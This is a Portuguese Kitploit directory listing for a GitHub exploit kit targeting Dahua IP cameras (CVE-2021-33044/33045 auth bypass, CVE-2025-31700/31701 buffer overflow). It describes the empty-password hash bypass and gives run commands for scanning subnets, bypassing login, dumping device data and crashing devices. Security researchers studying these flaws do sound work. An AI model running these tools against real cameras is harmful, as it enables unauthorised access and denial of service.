Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
dahua-cve-research — Kit de pesquisa de CVE para câmeras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
Ferramentas/GitHubGitHub/umair-aziz025/dahua-cve-research
Segurança IoTMapeamento de RedeAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

Kit de pesquisa de CVE para câmeras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)

Ver Repositório
2162há 5 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramentas de Exploração de CVEs para Câmeras IP Dahua

⚠️ EM DESENVOLVIMENTO — Estes scripts são baseados em detalhes de CVEs publicados e exigem testes adicionais contra dispositivos vulneráveis para confirmar a funcionalidade completa.

Scripts de pesquisa e prova de conceito para quatro vulnerabilidades críticas em câmeras IP Dahua.


⚠️ AVISO LEGAL

root@kitploit:~
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

By using these tools, you agree that:
  1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
  2. You will NOT use these tools for illegal activities
  3. You accept full responsibility for your actions
  4. The authors are NOT liable for any misuse or damage

Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.

CVEs Abordadas

CVECVSSTipoStatus
CVE-2021-330449.8 CRÍTICABypass de AutenticaçãoCISA KEV (explorada ativamente)
CVE-2021-330459.8 CRÍTICABypass de AutenticaçãoCISA KEV (explorada ativamente)
CVE-2025-317008.1 ALTABuffer Overflow DoSRecente (2025)
CVE-2025-317018.1 ALTABuffer Overflow DoSRecente (2025)

CVE-2021-33044 e CVE-2021-33045 — Bypass de Autenticação

  • CVSS: 9.8 CRÍTICA
  • CWE: CWE-287 (Autenticação Incorreta)
  • Mecanismo: o login RPC2 aceita hash de senha vazia, concedendo acesso de administrador
  • Afetados: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • Corrigido na versão: Firmware 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • Referências:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV Catalog

CVE-2025-31700 e CVE-2025-31701 — Buffer Overflow (DoS/RCE)

  • CVSS: 8.1 ALTA
  • CWE: CWE-120 (Cópia de Buffer Sem Verificação do Tamanho da Entrada)
  • Mecanismo: pacotes superdimensionados causam estouro de buffer → travamento ou possível RCE
  • Referências:
    • NVD CVE-2025-31700
    • Dahua Security Advisory

Como Funciona o Bypass de Autenticação

As câmeras Dahua usam autenticação de desafio-resposta em /RPC2_Login:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← EMPTY password
  step2 = MD5("step1:random:step1")

O firmware vulnerável aceita o hash de senha vazia e retorna um token de sessão válido.


Scripts


Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

Uso

Scanner de Rede

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

Portas comuns Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

Exploit Multi-CVE (Recomendado)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

Bypass de Autenticação

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Dump device info after bypass

DoS por Buffer Overflow

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 only

⚠️ AVISO: O script de DoS pode travar o dispositivo alvo.


Dependências

root@kitploit:~
requests

Todos os outros imports são da biblioteca padrão do Python: socket, struct, hashlib, threading, ipaddress, argparse, json


Status de Desenvolvimento

🚧 EM DESENVOLVIMENTO ATIVO

Estes scripts foram desenvolvidos com base em:

  • Detalhes de CVEs publicados pelo NVD
  • Advisories de Segurança da Dahua
  • Referências públicas de PoC (seclists.org, packetstormsecurity)

Status dos Testes:

  • ✅ Lógica de bypass de autenticação implementada conforme especificações do CVE
  • ✅ Payloads de estouro de buffer construídos conforme advisories
  • ⚠️ Testes limitados contra dispositivos vulneráveis reais
  • ⚠️ Validação adicional necessária em diversas versões de firmware

Se você tiver acesso a dispositivos vulneráveis para testes, contribuições e feedback são bem-vindos.


Contribuindo

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Teste suas alterações
  4. Envie um pull request

Por favor, relate quaisquer problemas ou falsos positivos.


Referências

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA Known Exploited Vulnerabilities
  • Dahua Security Center
  • Bashis PoC - Seclists

Licença

Licença MIT - Consulte o arquivo LICENSE.


Autor

Umair Aziz
GitHub: @umair-aziz025


Apenas para fins educacionais e de pesquisa de segurança autorizada.

Baixar ferramenta
ArquivoFinalidadeCVEs
dahua_scanner.pyDescoberta de rede — encontra câmeras Dahua na sub-redeDetecção
dahua_exploit.pyScanner multi-CVE — testa todas as vulnerabilidadesTodas
dahua_auth_bypass.pyBypass de autenticação dedicado com opção --dumpCVE-2021-33044/45
dahua_rce.pySonda de DoS por estouro de bufferCVE-2025-31700/01